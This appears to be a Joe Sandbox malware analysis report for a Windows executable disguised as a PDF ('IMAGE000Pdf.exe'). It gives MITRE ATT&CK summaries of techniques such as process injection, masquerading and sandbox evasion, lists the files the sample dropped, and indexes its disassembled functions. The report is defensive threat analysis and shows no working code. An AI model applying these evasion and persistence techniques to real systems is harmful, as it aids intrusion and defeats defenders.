Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IMAGE000Pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\kvindagtigt.ini

C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms\leakers.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms\persongalleriers.una

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms\porkiest.mis

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Mutuary.civ

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\Cresouserte.Oml

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\Maleriet213.arc

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\afsgning.for

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\bookishly.egg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Tilegnelsesevnes\etisk.hvs

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
IMAGE000Pdf.exe

Function 004034A2 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 00405B00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403E6B Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 00403ABD Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 0040642B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 00405456 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Function 00405925 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 00406773 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Function 00405F13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 70021777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00405DCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Function 004062BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Function 004059D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON